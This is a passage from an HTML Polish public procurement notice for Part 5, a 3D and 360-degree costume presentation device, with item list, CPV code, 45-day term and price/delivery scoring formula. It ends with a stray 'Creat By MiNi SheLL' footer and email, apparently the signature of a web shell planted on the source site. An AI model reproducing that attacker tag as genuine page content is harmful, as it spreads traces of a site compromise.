<br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Część 5<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 5  urządzenie do tworzenia prezentacji 3D i 360 stopni kostiumów:
a)	urządzenia bazowe do tworzenia prezentacji 3D i 360 stopni kostiumów, 1 kpl;
b)	aparat fotograficzny 1 szt.
c)	materiały eksploatacyjne 1 kpl.
d)	oprogramowanie do urządzenia do tworzenia prezentacji 3D i 360 stopni kostiumów,  1 szt.
e)	opieka serwisowa, instruktaż pracowników 1 kpl. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30200000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 45<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin realizacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	Ocena końcowa jest sumą punktów uzyskanych w powyższych kryteriach. Zamawiający udzieli zamówienia Wykonawcy, którego oferta została uznana za najkorzystniejszą, w oparciu o wyżej wymienione kryteria.
2.	Liczba punktów zostanie wyliczona z dokładnością do dwóch miejsc po przecinku. 
3.	Maksymalna ilość punktów, jaką łącznie może otrzymać oferta to 100. Liczba punktów zostanie wyliczona z dokładnością do dwóch miejsc po przecinku.
4.	Ocena ofert w kryterium Cena ( C ).
Zamawiający przyporządkuje najkorzystniejszej, czyli najniższej cenie, maksymalną liczbę punktów, tj. 60. Każdej następnej ofercie, Zamawiający przyporządkuje liczbę punktów proporcjonalnie mniejszą, stosując wzór:
C=	(cena najniższa	/cena oferty badanej) x 100 x 0,60 
5.	Ocena ofert w kryterium termin realizacji ( T )
Zamawiający przyzna poszczególnym ofertom punktację na podstawie wskazanego przez Wykonawcę w Formularzu oferty terminu realizacji, wg. poniższej punktacji:
5.1.	termin realizacji do 30 dni roboczych	  40 pkt;
5.2.	termin realizacji do 35 dni roboczych	  30 pkt;
5.3.	termin realizacji do 40 dni roboczych	  20 pkt;
5.4.	termin realizacji do 45 dni roboczych	  0 pkt.
Termin realizacji do 45 dni roboczych jest terminem maksymalnym dla Wykonawców składających ofertę w Części 5. W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu realizacji, Zamawiający przyjmie do oceny oferty Wykonawcy termin realizacji do 45 dni roboczych.
<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com